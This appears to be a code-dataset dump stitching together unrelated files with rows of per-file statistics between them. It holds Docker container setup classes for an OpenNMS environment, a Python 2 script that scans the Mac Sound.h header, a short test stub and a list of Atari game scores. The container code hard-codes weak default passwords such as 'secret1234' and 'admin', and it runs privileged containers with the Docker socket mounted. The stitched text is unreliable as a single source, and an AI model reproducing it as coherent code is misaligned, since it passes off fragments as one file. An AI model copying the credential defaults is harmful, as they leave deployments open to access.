# create image dir if not exist
os.makedirs(self._container_imagedir, exist_ok=True)
image_name = self._container_config.get_image()
output_filename = self._container_imagedir + self._container_imagename
docker_image = DockerImage(image_name)
docker_image.export_image(output_filename)
class OpenNMS(Container):
"""Class for defining a container for OpenNMS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_server", "postgres"),
("database_user", "postgres"),
("database_password", "secret1234"),
("user_admin_password", "admin"),
("user_api_password", "api"),
("cassandra_server", "cassandra"),
("cassandra_user", "cassandra"),
("cassandra_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["user_admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["user_api_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "OpenNMS",
"location": "/opennms",
"url": "http://opennms:8980"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-opennms:18.0.4-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/opennms")
self._container_config.add_buildarg("build_customrepo", "https://opennmsdeploy.nethinks.com/repo/horizon/18.0.4/")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.set_privileged(True)
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_DB_SERVER",
self._container_parameters["database_server"])
self._container_config.add_environment("INIT_DB_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("INIT_DB_PASSWORD",
self._container_parameters["database_password"])
self._container_config.add_environment("INIT_ADMIN_USER", "admin")
self._container_config.add_environment("INIT_ADMIN_PASSWORD",
self._container_parameters["user_admin_password"])
self._container_config.add_environment("INIT_API_USER", "api")
self._container_config.add_environment("INIT_API_PASSWORD",
self._container_parameters["user_api_password"])
self._container_namedvolumes.append("opennms")
self._container_namedvolumes.append("rrd")
self._container_config.add_volume("opennms:/data/container")
self._container_config.add_volume("rrd:/data/rrd")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/opennms:/data/init")
self._container_config.add_port("162/udp:162/udp")
self._container_config.add_port("514/udp:514/udp")
self._container_config.add_port("5817:5817")
self._container_config.add_dependency("postgres")
# check cassandra option and parameters
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_environment("INIT_CASSANDRA_ENABLE", "true")
self._container_config.add_environment("INIT_CASSANDRA_SERVER",
self._container_parameters["cassandra_server"])
self._container_config.add_environment("INIT_CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("INIT_CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_config.add_dependency("cassandra")
class PostgreSQL(Container):
"""Class for defining a container for PostgreSQL
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_user", "postgres"),
("database_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-postgres:9.5.3-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/postgres")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("POSTGRES_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("POSTGRES_PASSWORD",
self._container_parameters["database_password"])
self._container_namedvolumes.append("postgres")
self._container_config.add_volume("postgres:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/postgres:/data/init")
class Cassandra(Container):
"""Class for defining a container for Newts/Cassandra
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("cassandra_user", "cassandra"),
("cassandra_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "secret1234")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-cassandra:3.0.14-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/cassandra")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_namedvolumes.append("cassandra")
self._container_config.add_volume("cassandra:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/cassandra:/data/init")
class Nginx(Container):
"""Class for defining a container for Nginx
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssl_organisation", "NETHINKS GmbH"),
("ssl_unit", "PSS"),
("ssl_country", "DE"),
("ssl_state", "HESSEN"),
("ssl_location", "Fulda"),
("ssl_cn", "localhost"),
("ssl_valid_time_days", "3650"),
("ssl_keylength", "4096"),
("ssl_digest", "sha384")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssl_organisation"] = self._app_config.get_value("ssl", "organisation", "")
self._container_parameters["ssl_unit"] = self._app_config.get_value("ssl", "unit", "")
self._container_parameters["ssl_country"] = self._app_config.get_value("ssl", "country", "")
self._container_parameters["ssl_state"] = self._app_config.get_value("ssl", "state", "")
self._container_parameters["ssl_location"] = self._app_config.get_value("ssl", "location", "")
self._container_parameters["ssl_cn"] = self._app_config.get_value("ssl", "cn", "")
self._container_parameters["ssl_valid_time_days"] = self._app_config.get_value("ssl", "valid_time_days", "")
self._container_parameters["ssl_keylength"] = self._app_config.get_value("ssl", "keylength", "")
self._container_parameters["ssl_digest"] = self._app_config.get_value("ssl", "digest", "")
self._container_parameters["support_text"] = self._app_config.get_value("supportinfo", "support_text", "")
self.__proxy_locations = []
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-nginx:1.10.2-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/nginx")
self._container_config.set_restart_policy("always")
self._container_config.add_port("80:80")
self._container_config.add_port("443:443")
self._container_namedvolumes.append("nginx")
self._container_config.add_volume("nginx:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/nginx:/data/init")
self._container_config.add_environment("INIT_SSL_CN",
self._container_parameters["ssl_cn"])
self._container_config.add_environment("INIT_SSL_ORG",
self._container_parameters["ssl_organisation"])
self._container_config.add_environment("INIT_SSL_UNIT",
self._container_parameters["ssl_unit"])
self._container_config.add_environment("INIT_SSL_COUNTRY",
self._container_parameters["ssl_country"])
self._container_config.add_environment("INIT_SSL_STATE",
self._container_parameters["ssl_state"])
self._container_config.add_environment("INIT_SSL_LOCATION",
self._container_parameters["ssl_location"])
self._container_config.add_environment("INIT_SSL_VALIDDAYS",
self._container_parameters["ssl_valid_time_days"])
self._container_config.add_environment("INIT_SSL_KEYLENGTH",
self._container_parameters["ssl_keylength"])
self._container_config.add_environment("INIT_SSL_DIGEST",
self._container_parameters["ssl_digest"])
self._container_config.add_environment("CONF_SUPPORTTEXT",
self._container_parameters["support_text"])
i = 10
for location in self.__proxy_locations:
location_varname = "CONF_LOCATION_" + str(i)
location_value = location["name"] + ";" + location["location"] + ";" + location["url"]
self._container_config.add_environment(location_varname, location_value)
i += 1
def set_proxy_locations(self, proxy_locations):
"""Method for adding proxy locations
This method must be executed before the setup_container() method
"""
self.__proxy_locations.extend(proxy_locations)
class Grafana(Container):
"""Class for defining a container for Grafana
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "admin"),
("opennms_url", "http://opennms:8980/opennms"),
("opennms_username", "admin"),
("opennms_password", "admin")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "Grafana",
"location": "/grafana/",
"url": "http://grafana:3000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-grafana:3.1.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/grafana")
self._container_config.add_buildarg("url_sw_grafana", "https://opennmsdeploy.nethinks.com/software/grafana/grafana-3.1.1-1470047149.linux-x64.tar.gz")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("grafana")
self._container_config.add_volume("grafana:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/grafana:/data/init")
class AlarmForwarder(Container):
"""Class for defining a container for Alarmforwarder
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "admin"),
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "admin"),
("db_server", "postgres"),
("db_name", "alarmforwarder"),
("db_user", "postgres"),
("db_password", "postgres")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
self._container_parameters["db_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "AlarmForwarder",
"location": "/alarmforwarder/",
"url": "http://alarmforwarder:5000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-alarmforwarder:1.0.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/alarmforwarder")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("DB_SERVER",
self._container_parameters["db_server"])
self._container_config.add_environment("DB_NAME",
self._container_parameters["db_name"])
self._container_config.add_environment("DB_USER",
self._container_parameters["db_user"])
self._container_config.add_environment("DB_PASSWORD",
self._container_parameters["db_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("alarmforwarder")
self._container_config.add_volume("alarmforwarder:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/alarmforwarder:/data/init")
self._container_config.add_dependency("postgres")
class YourDashboard(Container):
"""Class for defining a container for yourDashboard
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "admin")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "yourDashboard",
"location": "/yourdashboard",
"url": "http://yourdashboard"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-yourdashboard:0.3-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/yourdashboard")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_OPENNMS_SERVER", "http://opennms:8980/opennms")
self._container_config.add_environment("INIT_OPENNMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("INIT_OPENNMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("yourdashboard")
self._container_config.add_volume("yourdashboard:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/yourdashboard:/data/init")
class Pris(Container):
"""Class for defining a container for PRIS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-pris:1.1.5-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/pris")
self._container_config.add_buildarg("url_sw_pris", "https://opennmsdeploy.nethinks.com/software/pris/opennms-pris-dist-1.1.5-release-archive.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_namedvolumes.append("pris")
self._container_config.add_volume("pris:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/pris:/data/init")
class IPv6Helper(Container):
"""Class for defining a container for IPv6Helper
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ip6net", "fd00:1::/48"),
("bridge_interface", "onmsenv0")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ip6net"] = self._app_config.get_value("network", "ipv6_internal_net", "")
self._container_parameters["bridge_interface"] = self._app_config.get_value("network", "bridge_interface_name", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-ipv6helper:1.0.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/ipv6helper")
self._container_config.set_restart_policy("always")
self._container_config.set_privileged(True)
self._container_config.set_network_mode("host")
self._container_config.add_environment("CONF_IP6NET",
self._container_parameters["ip6net"])
self._container_config.add_environment("CONF_BRIDGE_INTERFACE",
self._container_parameters["bridge_interface"])
self._container_config.add_volume("/lib/modules:/lib/modules:ro")
class Management(Container):
"""Class for defining a container for management access
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssh_password", "admin"),
("backup_enabled", "False"),
("backup_url", "smb://username:password@1.2.3.4/backup/test"),
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssh_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["backup_enabled"] = self._app_config.get_value("backup", "enabled", "False")
self._container_parameters["backup_url"] = self._app_config.get_value("backup", "url", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-management:1.1.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/management")
self._container_config.add_buildarg("url_sw_docker", "https://opennmsdeploy.nethinks.com/software/docker/docker-17.03.1-ce.tgz")
self._container_config.set_restart_policy("always")
self._container_config.add_port("2222:22")
self._container_config.add_environment("CONF_SSH_PASSWORD",
self._container_parameters["ssh_password"])
self._container_namedvolumes.append("export")
self._container_namedvolumes.append("management")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("management:/data/container")
self._container_config.add_volume("opennms:/data/all-containers/opennms")
self._container_config.add_volume("rrd:/data/all-containers/rrd")
self._container_config.add_volume("postgres:/data/all-containers/postgres")
self._container_config.add_volume("nginx:/data/all-containers/nginx")
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_volume("cassandra:/data/all-containers/cassandra")
if self._app_config.get_value_boolean("container", "alarmforwarder"):
self._container_config.add_volume("alarmforwarder:/data/all-containers/alarmforwarder")
if self._app_config.get_value_boolean("container", "grafana"):
self._container_config.add_volume("grafana:/data/all-containers/grafana")
if self._app_config.get_value_boolean("container", "yourdashboard"):
self._container_config.add_volume("yourdashboard:/data/all-containers/yourdashboard")
if self._app_config.get_value_boolean("container", "pris"):
self._container_config.add_volume("pris:/data/all-containers/pris")
self._container_config.add_volume("./init/management:/data/init")
self._container_config.add_volume("/var/run/docker.sock:/var/run/docker.sock")
# create backup config, if required
if self._container_parameters["backup_enabled"] != "False":
self._container_config.add_environment("CONF_BACKUP_ENABLED", "TRUE")
self._container_config.add_environment("CONF_BACKUP_URL",
self._container_parameters["backup_url"])
| 50.771721 | 162 | 0.664665 | 3,148 | 29,803 | 5.893901 | 0.087675 | 0.189178 | 0.148486 | 0.120944 | 0.761776 | 0.718282 | 0.626873 | 0.532769 | 0.482537 | 0.462057 | 0 | 0.008885 | 0.222058 | 29,803 | 586 | 163 | 50.858362 | 0.791374 | 0.103882 | 0 | 0.366584 | 0 | 0.017456 | 0.242338 | 0.061335 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072319 | false | 0.134663 | 0.01995 | 0 | 0.159601 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
c4a82663db56f02ccc3e090e4f1e6bf39ca9a07e | 4,580 | py | Python | Mac/Modules/snd/sndscan.py | jasonadu/Python-2.5 | 93e24b88564de120b1296165b5c55975fdcb8a3c | [
"PSF-2.0"
] | 1 | 2018-08-21T09:19:46.000Z | 2018-08-21T09:19:46.000Z | Mac/Modules/snd/sndscan.py | jasonadu/Python-2.5 | 93e24b88564de120b1296165b5c55975fdcb8a3c | [
"PSF-2.0"
] | null | null | null | Mac/Modules/snd/sndscan.py | jasonadu/Python-2.5 | 93e24b88564de120b1296165b5c55975fdcb8a3c | [
"PSF-2.0"
] | 2 | 2017-01-30T21:52:13.000Z | 2019-07-18T21:33:17.000Z | # Scan Sound.h header file, generate sndgen.py and Sound.py files.
# Then import sndsupport (which execs sndgen.py) to generate Sndmodule.c.
# (Should learn how to tell the compiler to compile it as well.)
import sys
import os
from bgenlocations import TOOLBOXDIR, BGENDIR
sys.path.append(BGENDIR)
from scantools import Scanner
def main():
input = "Sound.h"
output = "sndgen.py"
defsoutput = TOOLBOXDIR + "Sound.py"
scanner = SoundScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Testing definitions output code ==="
execfile(defsoutput, {}, {})
print "=== Done scanning and generating, now doing 'import sndsupport' ==="
import sndsupport
print "=== Done. It's up to you to compile Sndmodule.c ==="
class SoundScanner(Scanner):
def destination(self, type, name, arglist):
classname = "SndFunction"
listname = "functions"
if arglist:
t, n, m = arglist[0]
if t == "SndChannelPtr" and m == "InMode":
classname = "SndMethod"
listname = "sndmethods"
return classname, listname
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
def makeblacklistnames(self):
return [
'SndDisposeChannel', # automatic on deallocation
'SndAddModifier', # for internal use only
'SndPlayDoubleBuffer', # very low level routine
# Missing from libraries (UH332)
'SoundManagerSetInfo',
'SoundManagerGetInfo',
# Constants with funny definitions
'rate48khz',
'rate44khz',
'kInvalidSource',
# OS8 only:
'MACEVersion',
'SPBRecordToFile',
'Exp1to6',
'Comp6to1',
'Exp1to3',
'Comp3to1',
'SndControl',
'SndStopFilePlay',
'SndStartFilePlay',
'SndPauseFilePlay',
'SndRecordToFile',
]
def makeblacklisttypes(self):
return [
"GetSoundVol",
"SetSoundVol",
"UnsignedFixed",
# Don't have the time to dig into this...
"Component",
"ComponentInstance",
"SoundComponentDataPtr",
"SoundComponentData",
"SoundComponentData_ptr",
"SoundConverter",
]
def makerepairinstructions(self):
return [
([("Str255", "*", "InMode")],
[("*", "*", "OutMode")]),
([("void_ptr", "*", "InMode"), ("long", "*", "InMode")],
[("InBuffer", "*", "*")]),
([("void", "*", "OutMode"), ("long", "*", "InMode"),
("long", "*", "OutMode")],
[("VarVarOutBuffer", "*", "InOutMode")]),
([("SCStatusPtr", "*", "InMode")],
[("SCStatus", "*", "OutMode")]),
([("SMStatusPtr", "*", "InMode")],
[("SMStatus", "*", "OutMode")]),
([("CompressionInfoPtr", "*", "InMode")],
[("CompressionInfo", "*", "OutMode")]),
# For SndPlay's SndListHandle argument
([("Handle", "sndHdl", "InMode")],
[("SndListHandle", "*", "*")]),
# For SndStartFilePlay
([("long", "bufferSize", "InMode"), ("void", "theBuffer", "OutMode")],
[("*", "*", "*"), ("FakeType('0')", "*", "InMode")]),
# For Comp3to1 etc.
([("void_ptr", "inBuffer", "InMode"),
("void", "outBuffer", "OutMode"),
("unsigned_long", "cnt", "InMode")],
[("InOutBuffer", "buffer", "InOutMode")]),
# Ditto
## ([("void_ptr", "inState", "InMode"), ("void", "outState", "OutMode")],
## [("InOutBuf128", "state", "InOutMode")]),
([("StateBlockPtr", "inState", "InMode"), ("StateBlockPtr", "outState", "InMode")],
[("StateBlock", "state", "InOutMode")]),
# Catch-all for the last couple of void pointers
([("void", "*", "OutMode")],
[("void_ptr", "*", "InMode")]),
]
if __name__ == "__main__":
main()
| 35.503876 | 99 | 0.464192 | 324 | 4,580 | 6.512346 | 0.552469 | 0.01327 | 0.01327 | 0.018957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009097 | 0.375983 | 4,580 | 128 | 100 | 35.78125 | 0.729181 | 0.14607 | 0 | 0.032258 | 1 | 0 | 0.305577 | 0.011051 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064516 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c4ad1c463eaeab93be24f5ec8daa4a3369b44b3c | 314 | py | Python | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | 1 | 2020-04-30T12:00:21.000Z | 2020-04-30T12:00:21.000Z | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | null | null | null | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | null | null | null | import os
from src.model_manager import ModelManager
dir_path = os.path.dirname(os.path.realpath(__file__))
config_file = '{}/data/config/config_1.json'.format(dir_path)
model_dir = '{}/data/models'.format(dir_path)
def test_init():
mm = ModelManager(config_file, model_dir)
def test_predict():
pass
| 19.625 | 61 | 0.745223 | 47 | 314 | 4.659574 | 0.510638 | 0.09589 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003623 | 0.121019 | 314 | 15 | 62 | 20.933333 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0.133758 | 0.089172 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.111111 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
c4b6cdd41e4ccaed90308c503f92af65bcb70a25 | 6,644 | py | Python | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 45 | 2019-05-13T17:39:33.000Z | 2022-03-07T23:44:13.000Z | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 2 | 2019-03-29T01:41:59.000Z | 2019-07-02T02:48:31.000Z | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 2 | 2020-04-07T20:57:30.000Z | 2020-07-08T12:55:15.000Z | entries = [
{
"env-title": "atari-alien",
"env-variant": "No-op start",
"score": 6482.10,
},
{
"env-title": "atari-amidar",
"env-variant": "No-op start",
"score": 833,
},
{
"env-title": "atari-assault",
"env-variant": "No-op start",
"score": 11013.50,
},
{
"env-title": "atari-asterix",
"env-variant": "No-op start",
"score": 36238.50,
},
{
"env-title": "atari-asteroids",
"env-variant": "No-op start",
"score": 2780.40,
},
{
"env-title": "atari-atlantis",
"env-variant": "No-op start",
"score": 308258,
},
{
"env-title": "atari-bank-heist",
"env-variant": "No-op start",
"score": 988.70,
},
{
"env-title": "atari-battle-zone",
"env-variant": "No-op start",
"score": 61220,
},
{
"env-title": "atari-beam-rider",
"env-variant": "No-op start",
"score": 8566.50,
},
{
"env-title": "atari-berzerk",
"env-variant": "No-op start",
"score": 1641.40,
},
{
"env-title": "atari-bowling",
"env-variant": "No-op start",
"score": 75.40,
},
{
"env-title": "atari-boxing",
"env-variant": "No-op start",
"score": 99.40,
},
{
"env-title": "atari-breakout",
"env-variant": "No-op start",
"score": 518.40,
},
{
"env-title": "atari-centipede",
"env-variant": "No-op start",
"score": 3402.80,
},
{
"env-title": "atari-chopper-command",
"env-variant": "No-op start",
"score": 37568,
},
{
"env-title": "atari-crazy-climber",
"env-variant": "No-op start",
"score": 194347,
},
{
"env-title": "atari-defender",
"env-variant": "No-op start",
"score": 113128,
},
{
"env-title": "atari-demon-attack",
"env-variant": "No-op start",
"score": 100189,
},
{
"env-title": "atari-double-dunk",
"env-variant": "No-op start",
"score": 11.40,
},
{
"env-title": "atari-enduro",
"env-variant": "No-op start",
"score": 2230.10,
},
{
"env-title": "atari-fishing-derby",
"env-variant": "No-op start",
"score": 23.20,
},
{
"env-title": "atari-freeway",
"env-variant": "No-op start",
"score": 31.40,
},
{
"env-title": "atari-frostbite",
"env-variant": "No-op start",
"score": 8042.10,
},
{
"env-title": "atari-gopher",
"env-variant": "No-op start",
"score": 69135.10,
},
{
"env-title": "atari-gravitar",
"env-variant": "No-op start",
"score": 1073.80,
},
{
"env-title": "atari-hero",
"env-variant": "No-op start",
"score": 35542.20,
},
{
"env-title": "atari-ice-hockey",
"env-variant": "No-op start",
"score": 3.40,
},
{
"env-title": "atari-jamesbond",
"env-variant": "No-op start",
"score": 7869.20,
},
{
"env-title": "atari-kangaroo",
"env-variant": "No-op start",
"score": 10484.50,
},
{
"env-title": "atari-krull",
"env-variant": "No-op start",
"score": 9930.80,
},
{
"env-title": "atari-kung-fu-master",
"env-variant": "No-op start",
"score": 59799.50,
},
{
"env-title": "atari-montezuma-revenge",
"env-variant": "No-op start",
"score": 2643.50,
},
{
"env-title": "atari-ms-pacman",
"env-variant": "No-op start",
"score": 2724.30,
},
{
"env-title": "atari-name-this-game",
"env-variant": "No-op start",
"score": 9907.20,
},
{
"env-title": "atari-phoenix",
"env-variant": "No-op start",
"score": 40092.20,
},
{
"env-title": "atari-pitfall",
"env-variant": "No-op start",
"score": -3.50,
},
{
"env-title": "atari-pong",
"env-variant": "No-op start",
"score": 20.70,
},
{
"env-title": "atari-private-eye",
"env-variant": "No-op start",
"score": 15177.10,
},
{
"env-title": "atari-qbert",
"env-variant": "No-op start",
"score": 22956.50,
},
{
"env-title": "atari-riverraid",
"env-variant": "No-op start",
"score": 16608.30,
},
{
"env-title": "atari-road-runner",
"env-variant": "No-op start",
"score": 71168,
},
{
"env-title": "atari-robotank",
"env-variant": "No-op start",
"score": 68.50,
},
{
"env-title": "atari-seaquest",
"env-variant": "No-op start",
"score": 8425.80,
},
{
"env-title": "atari-skiing",
"env-variant": "No-op start",
"score": -10753.40,
},
{
"env-title": "atari-solaris",
"env-variant": "No-op start",
"score": 2760,
},
{
"env-title": "atari-space-invaders",
"env-variant": "No-op start",
"score": 2448.60,
},
{
"env-title": "atari-star-gunner",
"env-variant": "No-op start",
"score": 70038,
},
{
"env-title": "atari-surround",
"env-variant": "No-op start",
"score": 6.70,
},
{
"env-title": "atari-tennis",
"env-variant": "No-op start",
"score": 23.30,
},
{
"env-title": "atari-time-pilot",
"env-variant": "No-op start",
"score": 19401,
},
{
"env-title": "atari-tutankham",
"env-variant": "No-op start",
"score": 272.60,
},
{
"env-title": "atari-up-n-down",
"env-variant": "No-op start",
"score": 64354.20,
},
{
"env-title": "atari-venture",
"env-variant": "No-op start",
"score": 1597.50,
},
{
"env-title": "atari-video-pinball",
"env-variant": "No-op start",
"score": 469366,
},
{
"env-title": "atari-wizard-of-wor",
"env-variant": "No-op start",
"score": 13170.50,
},
{
"env-title": "atari-yars-revenge",
"env-variant": "No-op start",
"score": 102760,
},
{
"env-title": "atari-zaxxon",
"env-variant": "No-op start",
"score": 25215.50,
},
]
